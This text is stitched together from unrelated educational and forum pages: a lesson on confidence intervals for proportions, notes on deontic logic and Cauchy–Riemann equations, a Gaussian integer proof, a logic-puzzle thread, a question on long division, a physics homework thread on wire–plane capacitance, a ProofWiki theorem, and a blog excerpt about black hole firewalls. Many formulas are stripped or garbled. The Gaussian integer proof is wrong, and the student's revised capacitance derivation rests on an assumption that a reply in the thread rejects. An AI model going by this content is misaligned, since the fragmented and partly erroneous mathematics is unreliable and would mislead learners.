In estimating a parameter, we can use a point estimate or an interval estimate. The point estimate for the population proportion, \begin{align*}p\end{align*}, is \begin{align*}\hat{p}\end{align*}. We can also find interval estimates for this parameter. These intervals are based on the sampling distributions of \begin{align*}\hat{p}\end{align*}.
If we are interested in finding an interval estimate for the population proportion, the following two conditions must be satisfied:
1. We must have a random sample.
2. The sample size must be large enough (\begin{align*}n\hat{p}>10\end{align*} and \begin{align*}n(1-\hat{p})>10\end{align*}) that we can use the normal distribution as an approximation to the binomial distribution.
\begin{align*}\sqrt{\frac{p(1-p)}{n}}\end{align*} is the standard deviation of the distribution of sample proportions. The distribution of sample proportions is as follows:
Since we do not know the value of \begin{align*}p\end{align*}, we must replace it with \begin{align*}\hat{p}\end{align*}. We then have the standard error of the sample proportions, \begin{align*}\sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\end{align*}. If we are interested in a 95% confidence interval, using the Empirical Rule, we are saying that we want the difference between the sample proportion and the population proportion to be within 1.96 standard deviations.
That is, we want the following:
\begin{align*}&-1.96 \ \text{standard errors} < \hat{p}-p<1.96 \ \text{standard errors}\\ &-\hat{p}-1.96\sqrt{\frac{\hat{p}(1-\hat{p})}{n}} < - p < -\hat{p} + 1.96 \sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\\ &\hat{p} + 1.96 \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} > p > \hat{p}-1.96\sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\\ &\hat{p} - 1.96 \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} < p < \hat{p}+1.96\sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\end{align*}
This is a 95% confidence interval for the population proportion. If we generalize for any confidence level, the confidence interval is as follows:
\begin{align*}\hat{p}-z_{\frac{\alpha}{2}}\sqrt{\frac{\hat{p}(1-\hat{p})}{n}} < p < \hat{p} + z_{\frac{\alpha}{2}} \sqrt{\frac{\hat{p}(1-\hat{p})}{n}}\end{align*}
In other words, the confidence interval is \begin{align*}\hat{p} \pm z_{\frac{\alpha}{2}} \left ( \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} \right )\end{align*}. Remember that \begin{align*}z_{\frac{\alpha}{2}}\end{align*} refers to the positive \begin{align*}z\end{align*}-score for a particular confidence interval. Also, \begin{align*}\hat{p}\end{align*} is the sample proportion, and \begin{align*}n\end{align*} is the sample size. As before, the margin of error is \begin{align*}z_{\frac{\alpha}{2}} \left ( \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} \right )\end{align*}, and the confidence interval is \begin{align*}\hat{p}\pm\end{align*} the margin of error.
Example: A congressman is trying to decide whether to vote for a bill that would legalize gay marriage. He will decide to vote for the bill only if 70 percent of his constituents favor the bill. In a survey of 300 randomly selected voters, 224 (74.6%) indicated they would favor the bill. The congressman decides that he wants an estimate of the proportion of voters in the population who are likely to favor the bill. Construct a confidence interval for this population proportion.
Our sample proportion is 0.746, and our standard error of the proportion is 0.0251. We will construct a 95% confidence interval for the population proportion. Under the normal curve, 95% of the area is between \begin{align*}z = -1.96\end{align*} and \begin{align*}z=1.96\end{align*}. Thus, the confidence interval for this proportion would be:
\begin{align*}& 0.746 \pm (1.96)(0.0251)\\ & 0.697 < p < 0.795\end{align*}
With respect to the population proportion, we are 95% confident that the interval from 0.697 to 0.795 contains the population proportion. The population proportion is either in this interval, or it is not. When we say that this is a 95% confidence interval, we mean that if we took 100 samples, all of size \begin{align*}n\end{align*}, and constructed 95% confidence intervals for each of these samples, 95 out of the 100 confidence intervals we constructed would capture the population proportion, \begin{align*}p\end{align*}.
Example: A large grocery store has been recording data regarding the number of shoppers that use savings coupons at its outlet. Last year, it was reported that 77% of all shoppers used coupons, and 19 times out of 20, these results were considered to be accurate within 2.9%.
a) Are you dealing with a 90%, 95%, or 99% confidence level?
b) What is the margin of error?
c) Calculate the confidence interval.
d) Explain the meaning of the confidence interval.
a) The statement 19 times out of 20 indicates that you are dealing with a 95% confidence interval.
b) The results were accurate within 2.9%, so the margin of error is 0.029.
c) The confidence interval is simply \begin{align*}\hat{p} \pm\end{align*} the margin of error.
\begin{align*}77\%-2.9\%=74.1\% \qquad 77\%+2.9\%=79.9\%\end{align*}
Thus, the confidence interval is from 0.741 to 0.799.
d) The 95% confidence interval from 0.741 to 0.799 for the population proportion is an interval calculated from a sample by a method that has a 0.95 probability of capturing the population proportion.
On the Web
http://tinyurl.com/27syj3x This simulates confidence intervals for the population proportion.
http://tinyurl.com/28z97lr Explore how changing the confidence level and/or the sample size affects the length of the confidence interval.
## Lesson Summary
In this lesson, you learned that a sample mean is known as a point estimate, because this single number is used as a plausible value of the population mean. In addition to reporting a point estimate, you discovered how to calculate an interval of reasonable values based on the sample data. This interval estimator of the population mean is called the confidence interval. You can calculate this interval for the population mean by using the formula \begin{align*}\bar{x}\pm z_{\frac{\alpha}{2}} \left ( \frac{\sigma}{\sqrt{n}} \right )\end{align*}. The value of \begin{align*}z_{\frac{\alpha}{2}}\end{align*} is different for each confidence interval of 90%, 95%, and 99%. You also learned that the probability is attributed to the method used to calculate the confidence interval.
In addition, you learned that you calculate the confidence interval for a population proportion by using the formula \begin{align*}\hat{p} \pm z_{\frac{\alpha}{2}} \left ( \sqrt{\frac{\hat{p}(1-\hat{p})}{n}} \right )\end{align*}.
## Points to Consider
• Does replacing \begin{align*}\sigma\end{align*} with \begin{align*}s\end{align*} change your chance of capturing the unknown population mean?
• Is there a way to increase the chance of capturing the unknown population mean?
For an explanation of the concept of confidence intervals (17.0), see kbower50, What are Confidence Intervals? (3:24).
For a description of the formula used to find confidence intervals for the mean (17.0), see mathguyzero, Statistics Confidence Interval Definition and Formula (1:26).
For an interactive demonstration of the relationship between margin of error, sample size, and confidence intervals (17.0), see wolframmathematica, Confidence Intervals: Confidence Level, Sample Size, and Margin of Error (0:16).
For an explanation on finding the sample size for a particular margin of error (17.0), see statslectures, Calculating Required Sample Size to Estimate Population Mean (2:18).
## Review Questions
1. In a local teaching district, a technology grant is available to teachers in order to install a cluster of four computers in their classrooms. From the 6,250 teachers in the district, 250 were randomly selected and asked if they felt that computers were an essential teaching tool for their classroom. Of those selected, 142 teachers felt that computers were an essential teaching tool.
1. Calculate a 99% confidence interval for the proportion of teachers who felt that computers are an essential teaching tool.
2. How could the survey be changed to narrow the confidence interval but to maintain the 99% confidence interval?
2. Josie followed the guidelines presented to her and conducted a binomial experiment. She did 300 trials and reported a sample proportion of 0.61.
1. Calculate the 90%, 95%, and 99% confidence intervals for this sample.
2. What did you notice about the confidence intervals as the confidence level increased? Offer an explanation for your findings?
3. If the population proportion were 0.58, would all three confidence intervals enclose it? Explain.
Keywords
Central Limit Theorem
The distribution of the sample mean will approach a normal distribution when the sample size increases.
Confidence interval
Range of possible values the parameter might take.
Confidence level
The probability that the method used to calculate the confidence interval will produce an interval that will enclose the population parameter.
Margin of error
The amount that is added to and subtracted from the mean to construct the confidence interval.
Parameter
Numerical descriptive measure of a population.
Point estimate
Sampling distributions are the connecting link between the collection of data by unbiased random sampling and the process of drawing conclusions from the collected data. Results obtained from a survey can be reported as a point estimate.
Sample means
the sampling distribution of the sample means is approximately normal, as can be seen by the bell shape in each of the graphs.
Sample proportion
If this procedure gives 48 students who approve of the dress code and 52 who disapprove, the result would be recorded on the figure by placing a dot at 48%. This statistic is the sample proportion.
Sampling distributions
The sampling distribution is the probability distribution of the statistic.
Standard error
The standard error is also a function of the sample size. In other words, as the sample size increases, the standard error decreases, or the bigger the sample size, the more closely the samples will be clustered around the true value.
### Notes/Highlights Having trouble? Report an issue.
Color Highlighted Text Notes
Show Hide Details
Description
Tags:
Subjects:
|
|
## Monday, March 24, 2008
Deontic logic is the field of logic that is concerned with obligation, permission, and related concepts. Alternatively, a deontic logic is a formal system that attempts to capture the essential logical features of these concepts. Typically, a deontic logic uses OA to mean it is obligatory that A, (or it ought to be (the case) that A), and PA to mean it is permitted (or permissible) that A. The term deontic is derived from the ancient Greek déon, meaning, roughly, that which is binding or proper.
History
Philosophers from the Indian Mimamsa school to those of Ancient Greece have remarked on the formal logical relations of deontic concepts In his Elementa juris naturalis, Leibniz notes the logical relations between the licitum, illicitum, debitum, and indifferens are equivalent to those between the possible, impossible, necessarium, and contingens respectively.
Pre-History of Deontic Logic
Ernst Mally, a pupil of Alexius Meinong, was the first to propose a formal system of deontic logic in his Grundgesetze des Sollens and he founded it on the syntax of Whitehead's and Russell's propositional calculus. Mally's deontic vocabulary consisted of the logical constants U and ∩, unary connective !, and binary connectives f and ∞. * Mally read !A as "A ought to be the case". * He read A f B as "A requires B" . * He read A ∞ B as "A and B require each other." * He read U as "the unconditionally obligatory" . * He read ∩ as "the unconditionally forbidden". Mally defined f, ∞, and ∩ as follows:
Def. f. A f B = A → !B Def. ∞. A ∞ B = (A f B) & (B f A) Def. ∩. ∩ = ¬U Mally proposed five informal principles:
(i) If A requires B and if B then C, then A requires C. (ii) If A requires B and if A requires C, then A requires B and C. (iii) A requires B if and only if it is obligatory that if A then B. (iv) The unconditionally obligatory is obligatory. (v) The unconditionally obligatory does not require its own negation. He formalized these principles and took them as his axioms:
Mally's First Deontic Logic and von Wright's First Plausible Deontic Logic
In von Wright's first system, obligatoriness and permissibility were treated as features of acts. It was found not much later that a deontic logic of propositions could be given a simple and elegant Kripke-style semantics, and von Wright himself joined this movement. The deontic logic so specified came to be known as "standard deontic logic," often referred to as SDL, KD, or simply D. It can be axiomatized by adding the following axioms to a standard axiomatization of classical propositional logic:
$O(A rightarrow B) rightarrow (OA rightarrow OB)$
$OA rightarrow PA$
In English, these axioms say, respectively:
FA, meaning it is forbidden that A, can be defined (equivalently) as $O lnot A$ or $lnot PA$.
The propositional system D can be extended to include quantifiers in a relatively straightforward way.
If it ought to be that A implies B, then if it ought to be that A, it ought to be that B;
If it ought to be that A, then it is permissible that A. Standard deontic logic
An important problem of deontic logic is that of how to properly represent conditional obligations, e.g. If you smoke (s), then you ought to use an ashtray (a). It is not clear that either of the following representations is adequate:
$O(mathrm{smoke} rightarrow mathrm{ashtray})$
$mathrm{smoke} rightarrow O(mathrm{ashtray})$
Under the first representation it is vacuously true that if you commit a forbidden act, then you ought to commit any other act, regardless of whether that second act was obligatory, permitted or forbidden (Von Wright 1956, cited in Aqvist 1994). Under the second representation, we are vulnerable to the gentle murder paradox, where the plausible statements if you murder, you ought to murder gently, you do commit murder and to murder gently you must murder imply the less plausible statement: you ought to murder.
Some deontic logicians have responded to this problem by developing dyadic deontic logics, which contain a binary deontic operators:
$O(A mid B)$ means it is obligatory that A, given B
$P(A mid B)$ means it is permissible that A, given B.
(The notation is modeled on that used to represent conditional probability.) Dyadic deontic logic escapes some of the problems of standard (unary) deontic logic, but it is subject to some problems of its own.
|
|
# Cauchy-Riemann conditions
(Redirected from Cauchy–Riemann conditions)
d'Alembert–Euler conditions
Conditions that must be satisfied by the real part and the imaginary part of a complex function , , for it to be monogenic and analytic as a function of a complex variable.
A function , defined in some domain in the complex -plane, is monogenic at a point , i.e. has a derivative at as a function of the complex variable , if and only if its real and imaginary parts and are differentiable at as functions of the real variables and , and if, moreover, the Cauchy–Riemann equations hold at that point:
(1)
If the Cauchy–Riemann equations are satisfied, then the derivative can be expressed in any of the following forms:
A function , defined and single-valued in a domain , is analytic in if and only if its real and imaginary parts are differentiable functions satisfying the Cauchy–Riemann equations throughout . Each of the two functions and of class satisfying the Cauchy–Riemann equations (1) is a harmonic function of and ; the conditions (1) constitute conjugacy conditions of these two harmonic functions: Knowing one of them, the other may be found by integration.
The conditions (1) are valid for any two orthogonal directions and , with the same mutual orientations as the - and -axes, in the form:
For example, in polar coordinates , for :
Defining the complex differential operators by
one can rewrite the Cauchy–Riemann equations (1) as
Thus, a differentiable function of the variables and is an analytic function of if and only if .
For analytic functions of several complex variables , , , the Cauchy–Riemann equations constitute a system of partial differential equations (overdetermined when ) for the functions
(2)
or, in terms of the complex differentiation operators:
Each of the two functions and of class satisfying the conditions (2) is a pluriharmonic function of the variables and (). When the pluriharmonic functions constitute a proper subclass of the class of harmonic functions. The conditions (2) are conjugacy conditions for two pluriharmonic functions and : Knowing one of them, one can determine the other by integration.
The conditions (1) apparently occurred for the first time in the works of J. d'Alembert [1]. Their first appearance as a criterion for analyticity was in a paper of L. Euler, delivered at the Petersburg Academy of Sciences in 1777 [2]. A.L. Cauchy utilized the conditions (1) to construct the theory of functions, beginning with a memoir presented to the Paris Academy in 1814 (see [3]). The celebrated dissertation of B. Riemann on the fundamentals of function theory dates from 1851 (see [4]).
#### References
[1] J. d'Alembert, "Essai d'une nouvelle théorie de la résistance des fluides" , Paris (1752) [2] L. Euler, Nova Acta Acad. Sci. Petrop. , 10 (1797) pp. 3–19 [3] A.L. Cauchy, "Mémoire sur les intégrales définies" , Oeuvres complètes Ser. 1 , 1 , Paris (1882) pp. 319–506 [4] "Grundlagen für eine allgemeine Theorie der Funktionen einer veränderlichen komplexen Grösse" H. Weber (ed.) , Riemann's gesammelte math. Werke , Dover, reprint (1953) pp. 3–48 (Dover, reprint, 1953) [5] A.I. Markushevich, "Theory of functions of a complex variable" , 1 , Chelsea (1977) pp. Chapt. 1 (Translated from Russian) [6] B.V. Shabat, "Introduction of complex analysis" , 1–2 , Moscow (1976) pp. 1, Chapt. 1; 2, Chapt. 1 (In Russian)
|
|
## In the Gaussian integers, the conjugate of a prime is prime
Prove that if $a+bi$ is irreducible in $\mathbb{Z}[i]$, then so is $b+ai$.
Note that conjugation preserves multiplication in $\mathbb{Z}[i]$; $\overline{\alpha\beta} = \overline{\alpha} \overline{\beta}$ for all $\alpha$ and $\beta$. As a consequence, if $\alpha$ is irreducible then $\overline{\alpha}$ is as well.
Note that $b+ai = \overline{(-i)(a+bi)}$. Thus, if $a+bi$ is irreducible, then so is $b+ai$.
|
|
# Tetrikabe: Hiding in the Corners
This puzzle is dedicated to Sciborg. Copying the dear gentleperson, some of the 4s are hiding in the corners.
Rules: (Nurikabe section shamelessly stolen from an earlier puzzle by @jafe)
• Unshaded cells are divided into regions, all of which contain exactly one number. The number indicates how many unshaded cells there are in that region.
• SPECIAL RULE: the regions will form a tetromino set, with rotation and reflection allowed.
• Regions of unshaded cells cannot be (orthogonally) adjacent to one another, but they may touch at a corner.
• All shaded cells must be connected.
• There are no groups of shaded cells that form a 2 × 2 square anywhere in the grid.
I've included all available tetrominoes as a reference.
A playable version of this puzzle can be found here. The link leads to a puzz.link editor. Note that this editor won't force you to use the tetromino rule, and it has a timer.
The first answer with a fully-explained logical solution path will get the checkmark. I welcome multiple answers, if later ones can show a better-explained or more elegant path.
CSV:
,,,,,,4
,,,,,,
,,,4,,,
,,4,,4,,
,,,,,,
,,,,,,
4,,,,,,
• Should each tetromino be used exactly once? Also, this seems quite easy even to brute force since the shape is restricted. But good puzzle! – justhalf Dec 2 '20 at 4:10
• Yes, each tetromino should be used exactly once, that's what is meant by a "tetromino set". And of course you could brute-force it due to the small size, but you can do that with any small puzzle. The fun is supposed to be finding the elegant solution. – bobble Dec 2 '20 at 4:12
@Bubbler and others solved this before me, but I figured I would share my solve path too, since I love that this puzzle was dedicated to me!
So first, I filled in the obvious squares to give me a starting point:
Then I saw that there were two 2x2 regions that needed to be filled with island, since we can't have any 2x2 oceans. Those were these regions here:
Then I realized those 2x2 regions could only be reached in specific ways - that is, I needed to have the bottom right piece reach downwards, and a piece reaching up to the top left corner. So I knew that I had to place the L and the S pieces in those two spots, although I wasn't sure yet which was which.
I filled in some oceans. And, since I knew the top piece had to reach upwards:
From here it was clear to me that the L piece had to go in this spot, since the S-piece wouldn't fit. So now I had placed a tetromino, and I knew the S piece had to go in the other spot in the only orientation that made sense.
Now I looked at my grid again. Having placed the L and S, it was clear to me that the top right corner must be the T piece. If it was the O piece, there would be a 2x2 region left unfilled, and there wasn't enough room for it to be the I piece.
So I placed the T:
And from there, the final grid was clear:
Apparently too late to the game, but anyway here it goes. Hope this one is the intended solving path. (I think the existing two answers have at least some logical leaps.)
Step 1:
Start by marking walls between the crammed fours at the center. Looking at top left and bottom right 2x2 corners, the only cell that can be occupied by a tetromino is the inner cell (R2C2 and R6C6 respectively).
Step 2:
R2C2 must be part of a 4 starting from either R3C4 or R4C3. That piece is an L either way. R6C6 must share the area with R4C5, and it can't be L, so it must be an S.
Step 3:
In order to avoid 2x2 wall at R6-7C4-5, the only way is to place an I horizontally at the bottom. (Placing an L starting from R4C3 to cover R6C4 doesn't work because L must contain R2C2.)
Finally:
Placing L on the left side makes problems, so L should go right and cover R3C4. Then it is straightforward to see that the middle left must be an O and the upper right corner must be a T.
• This is indeed the intended solve path. The exact reason that placing an L on the left side causes problems is that R5C3 must be unshaded to prevent a 2x2 in R56C34. – bobble Dec 2 '20 at 4:56
• Oh yes, that works too. – Bubbler Dec 2 '20 at 4:58
Logical deductions by picture:
First of all the blue tiles represent some obvious deductions then I saw R2C2 could not be blue... So I tried this hypothetical situation....
But using this there was way no way to complete the grid...
So I saw that it could only be covered by of the tetromino on the top of the image. Then the square at R6C6 can only by covered with the remaining tetromino:
Then the tetromino in the bottom left could only be a straight because the last two remaining cannot be and the middle left tetromino could not be the T tetromino other wise it would block regions of blue from each other so it has to be a square so the top right in a T and with a little bit of a fiddle I solved it.
• Please explain those deductions with words, because it isn't obvious what you're doing in those pictures. – bobble Dec 2 '20 at 4:32
• While you're doing that, would it be possible to crop the pictures so that all the extra stuff isn't distracting from the grid? (Also center that picture that's off-center with the grid off-screen). – bobble Dec 2 '20 at 4:36
• Please don't post answers without logical explanations if you're only going to add in logical explanations immediately after. Even if you don't intend for it to come off this way, it appears like you're just posting to "claim a spot" and don't care about answer quality. (We talked about this on meta in the context of "lists of clues" puzzles, but it applies equally to situations like this.) – Deusovi Dec 2 '20 at 5:06
• Additionally, screenshots with a bunch of clutter like this are not particularly useful in answers. The extra bits are distracting and make the answer very hard to read -- overpowering the text that contains the actual explanation. It means that the answer will likely not be very useful for any future solvers. – Deusovi Dec 2 '20 at 5:08
• Given that you're using an image editor, you could have used "save image" feature within the app, which give much cleaner images than your screenshots here. We're not blind, we're just trying to improve the post quality. – Bubbler Dec 2 '20 at 5:26
|
|
# How to solve division one digit at a time?
I’m developing a computer program and I’m trying to work out some arithmetic algorithms for working with very large numbers. So far I have worked out a plan for addition, subtraction, and multiplication but division seems to be much more complicated. The numbers I’m working with are very large and I cannot process the entire number at once, so I have to perform these math operations piece by piece.
NOTE: For the programmers here, I am using Java which has the BigDecimal class for working with large numbers, but without going into a lengthy explanation I would like to create my own version.
I have looked at the source code for the division in Java’s MutableBigInteger to see if I could get some ideas from it, but it does a lot of things that I don’t know why it’s doing them. I’ve also read up on various division algorithms and they all seem to be about the same level of complexity. But I think once I see the process at work on an actual math problem I can work out the coding details.
I’ve worked out some very simple math problems processing only one digit at a time instead of the entire number.
For addition, this is very simple to do:
6.8 + 8.5 =
8+5=3 (carry 1)
6+8+1=5 (carry 1)
1
And the result is “1 5 3” or 15.3.
Division...not so simple apparently. Here is a basic example which I can’t seem to get to the answer “3” working with only one digit at a time:
7.2 / 2.4 = 3
I’ve tried a few methods such as dividing each digit to get an integer value and using the modulus operation for the remainder to combine with the next digit over, but I’ve only made a mess of things so far. This doesn’t seem like it should be that difficult, but it’s proving to be (I guess that’s why the division algorithms I’ve looked at are so complex)...so I think I need to enlist the help of some math gurus here. Any help on this would be greatly appreciated. Thanks. :)
• I am not sure this is possible if you want to break up the digits of the divisor. I could very well be wrong though. – ixsetf Dec 12 '15 at 2:48
• You will do far better to ask this question on a programming forum or to look into a book like Knuth's Seminumerical Algorithms. If you want to figure a method out for yourself, then you should first of all understand the pencil-and-paper process called long division. – Rob Arthan Dec 12 '15 at 2:50
• @ixsetf, yes, breaking up the divisor is a tricky part that I can't quite figure out. But now I don't feel so bad for not getting it yet...this has been driving me nuts for several days. It seems like it is possible because the division for Java's MutableBigInteger does it. But I've looked at the source code for it and I just don't understand many of the things it does and the comments in the source code are not very detailed or helpful. Seeing a basic math problem worked out which shows how it is done to better understand the process would be very helpful, but I can't find anything like this. – Tekkerue Dec 12 '15 at 5:18
• @Tekkerue Unless there is a specific reason why you need to break the divisor up digit by digit, I would suggest taking it as a whole and using the long division approach Rob Arthan mentioned. It will most likely be more efficient than any method taking individual digits of the divisor. – ixsetf Dec 12 '15 at 5:36
• @Rob Arthan, I am on the programming forum stackoverflow & this is my first post on the math forum here, but I thought that since I'm asking to see a math problem worked out the math forum might be a better place for this question. I do understand normal long division, it's the splitting up the digits and putting them back together that is the hard part. Java's MutableBigInteger uses Knuth's "Algorithm D" and I've looked at both the source for MutableBigInteger and Knuth's book, but it's like reading the answer in another language. But seeing a real math problem worked out would really help. – Tekkerue Dec 12 '15 at 5:39
|
|
# Capacitance between a wire and a plane
1. Jun 21, 2017
### Kelly Lin
1. The problem statement, all variables and given/known data
2. Relevant equations
I want to know whether my process is correct?
THANKS!!!
3. The attempt at a solution
1. By using Gauss's law:
$$E\cdot 2\pi rz = \frac{\lambda z}{\epsilon_{0}}\Rightarrow E=\frac{\lambda}{2\pi\epsilon_{0} r}$$
In my coordinate system, $$E=\frac{\lambda}{2\pi\epsilon_{0}[y^{2}+(z-d)^{2}]^{-1/2}}$$
Then,
$$V=-\int\mathbf{E}\cdot d\mathbf{l}=-\int_{0}^{z}\frac{\lambda}{2\pi\epsilon_{0}[y^{2}+(z-d)^{2}]^{-1/2}}dz=\frac{\lambda}{2\pi\epsilon_{0}y}\ln{\frac{\left | \sqrt{d^{2}+y^{2}}-d \right |}{\left | \sqrt{(z-d)^{2}+y^{2}}+(z-d) \right |}}$$
Since $$C=\frac{Q}{V}$$, then
$$C(\text{per length})=2\pi\epsilon_{0}y\ln{\frac{\left | \sqrt{(z-d)^{2}+y^{2}}+(z-d) \right |}{\left | \sqrt{d^{2}+y^{2}}-d \right |}}$$
2.
Use $$\sigma=-\epsilon\frac{\partial V}{\partial z}|_{z=0}$$ to get the answer.
2. Jun 21, 2017
### haruspex
No, several errors.
You have written the expression for the field at some arbitrary point, (y, z).
First problem: the expression would be correct without the plate. Perhaps the charge distribution on the plate changes it?
Second problem: you integrate this wrt z,but leaving y as arbitrary. What path is that along?
Note that it would be simpler to run the integral in the other direction, avoiding the d-z.
Third problem: if you fix the second problem, you will get an integral that diverges at the wire end. You need to take into account the radius of the wire.
Fourth problem. You have z as a bound on the integral. What should it be?
3. Jun 21, 2017
### Kelly Lin
Now, I correct my process!
Firstly, the electric field generated by the plane is $$E_{plane}=\frac{\sigma}{2\epsilon_{0}}\hat{\mathbf{z}}$$.
Then, by the definition of potential, I can get the potential $$V_{plane}=-\frac{\sigma}{2\epsilon_{0}}z$$
On the other hand, the electric field generated by the wire is $$E_{wire}=\frac{\lambda}{2\pi\epsilon_{0}r}\hat{\mathbf{r}}$$
Then, the potential is $$V_{wire}=-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{r}{a}}=-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{\sqrt{(z-d)^{2}+y^{2}}}{a}}$$
Thus, the total potential will be $$V_{total}=-\frac{\sigma}{2\epsilon_{0}}z-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{\sqrt{(z-d)^{2}+y^{2}}}{a}}$$
Now, we can use the relation $$\sigma=-\epsilon\frac{\partial V}{\partial z}|_{z=0}$$ to get the surface charge density.
$$\sigma = \frac{\lambda}{2\pi} \frac{a}{\sqrt{(z-d)^{2}+y^{2}}} \frac{1}{2} \frac{2(z-d)}{\sqrt{(z-d)^{2}+y^{2}}} |_{z=0} + \frac{\sigma}{2}\\ \frac{\sigma}{2} = \frac{\lambda}{2\pi} \frac{-ad}{d^{2}+y^{2}}\\ \sigma = \frac{-\lambda a d}{\pi(d^{2}+y^{2})}$$
Then, we can go back and get the total potential in the system
$$V =-\frac{\lambda}{2\pi\epsilon_{0}}\ln{\frac{\sqrt{(z-d)^{2}+y^{2}}}{a}} + \frac{\lambda adz}{2\pi\epsilon_{0}(d^{2}+y^{2})}$$
and the capacitance per length of the wire is
[tex]
C = \frac{\lambda}{V} = \frac{2\pi\epsilon_{0}(d^{2}+y^{2})}{adz} - 2\pi\epsilon_{0}\ln{\frac{a}{\sqrt{(z-d)^{2}+y^{2}}}}
[\tex]
4. Jun 21, 2017
### haruspex
That expression is for a uniformly charged plane. It won't be.
Consider the method of images.
5. Jun 21, 2017
### Kelly Lin
At first glance of the question, I came up with this method.
However, the plane isn't grounded so I am unsure if this method is valid for this problem?
6. Jun 21, 2017
### haruspex
It is an infinite plane. That is effectively grounded.
7. Jun 21, 2017
### Kelly Lin
Oh~ I see~
Thanks a lot!!!!!!!!!
|
|
# Product Form of Sum on Completely Multiplicative Function
## Theorem
Let $f$ be a completely multiplicative arithmetic function.
Let the series $\displaystyle \sum_{n \mathop = 1}^\infty \map f n$ be absolutely convergent.
Then:
$\displaystyle \sum_{n \mathop = 1}^\infty \map f n = \prod_p \frac 1 {1 - \map f p}$
where the infinite product ranges over the primes.
## Proof
Define $P$ by:
$\ds \map P {A, K}$ $:=$ $\ds \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \frac {1 - \map f p^{K + 1} } {1 - \map f p}$ where $\mathbb P$ denotes the set of prime numbers $\ds$ $=$ $\ds \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \paren {\sum_{k \mathop = 0}^K \map f p^k}$ Sum of Geometric Sequence $\ds$ $=$ $\ds \sum_{v \mathop \in \prod \limits_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \set {0 \,.\,.\, K} } \paren {\prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \map f p^{v_p} }$ Product of Summations is Summation Over Cartesian Product of Products $\ds$ $=$ $\ds \sum_{v \mathop \in \prod \limits_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \set {0 \,.\,.\, K} } \map f {\prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } p^{v_p} }$ as $f$ is completely multiplicative
Change the summing variable using:
$\ds \sum_{v \mathop \in V} \map g {\map h v}$ $=$ $\ds \sum_{w \mathop \in \set {\map h v: v \mathop \in V} } \map g w$ where $h$ is a one to one mapping
The Fundamental Theorem of Arithmetic guarantees a unique factorization for each positive natural number.
Therefore this function is one to one:
$\displaystyle \map h v = \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } p^{v_p}$
Then:
$\ds \map P {A, K}$ $=$ $\ds \sum_{n \mathop \in \map Q {A, K} } \map f n$ change of summing variable
where $\map Q {A, K}$ is defined as:
$\displaystyle \map Q {A, K} := \set {\prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } p^{-v_p} : v \in \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \set {0 \,.\,.\, K} }$
Consider:
$\ds W$ $=$ $\ds \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \map Q {A, K}$ $\ds$ $=$ $\ds \set {\prod_{p \mathop \in \mathbb P} p^{-v_p}: v \in \prod_{p \mathop \in \mathbb P} \set {0 \,.\,.\, \infty} }$
The construction defines it as the set of all possible products of positive powers of primes.
From the definition of a prime number, every positive natural number may be expressed as a prime or a product of powers of primes:
$k \in \N^+ \implies k \in W$
and also every element of W is a positive natural number:
$k \in W \implies k \in \N^+$
So $W = \N^+$.
Then taking limits on $\map P {A, K}$:
$\ds \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \map P {A, K}$ $=$ $\ds \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \prod_{\substack {p \mathop \in \mathbb P \\ p \mathop \le A} } \frac {1 - \map f p^{K + 1} } {1 - \map f p}$ taking limits of both sides of the definition of $\map P {A, K}$ $\ds$ $=$ $\ds \prod_{p \mathop \in \mathbb P} \frac 1 {1 - \map f p}$ $\map f p^{K + 1} \to 0$, because $\displaystyle \sum_{n \mathop = 1}^{\infty} \map f n$ is convergent $\ds$ $=$ $\ds \lim_{\substack {A \mathop \to \infty \\ K \mathop \to \infty} } \sum_{n \mathop \in \map Q {A, K} } \map f n$ from the expression for $\map P {A, K}$ $\ds$ $=$ $\ds \sum_{n \mathop \in \N^+} \map f n$ substituting for $\N^+$: order of summation is not defined $\ds$ $=$ $\ds \sum_{n \mathop = 1}^\infty \map f n$ absolutely convergent, so the order does not alter the limit
$\blacksquare$
## Note
A part of this page has to be extracted as a theorem:Extract this to a page in its own right.
When the function $f$ is multiplicative but not completely multiplicative, the above derivation is still valid, except that we do not have the equality:
$\dfrac 1 {1 - \map f p} = \paren {1 + \map f p + \map f {p^2} + \cdots}$
Therefore, in this case we may write:
$\displaystyle \sum_{n \mathop = 1}^\infty \map f n = \prod_p \paren {1 + \map f p + \map f {p^2} + \cdots}$
|
|
## Friday, October 19, 2012
### How empty is the black hole interior?
I've exchanged a dozen of e-mails with Joe Polchinski, the most well-known physicist in the original team that proposed the firewalls. We haven't converged and Joe ultimately decided he didn't have time to continue and recommended me to write a paper instead (which he wouldn't read, I guess). However, he started to listen to what my resolution actually is and I could see his actual objection to it which seems flawed to me, as I discuss below.
Recall that $$\heartsuit$$ represents the (near) maximum entanglement and the firewall folks demonstrate that because $$R\heartsuit R'$$, the following things hold:$A\heartsuit B, \quad R_B \heartsuit B.$ The degrees of freedom $${\mathcal O}(r_s)$$ outside the black hole at $$t=0$$ when the black hole gets old are maximally entangled with some part $$R_B$$ of the early Hawking radiation (because $$R\heartsuit R'$$) as well as with the degrees of freedom inside the black hole $$A$$ which are "mirror symmetrically" located in the other Rindler wedge from (infalling) Alice's viewpoint.
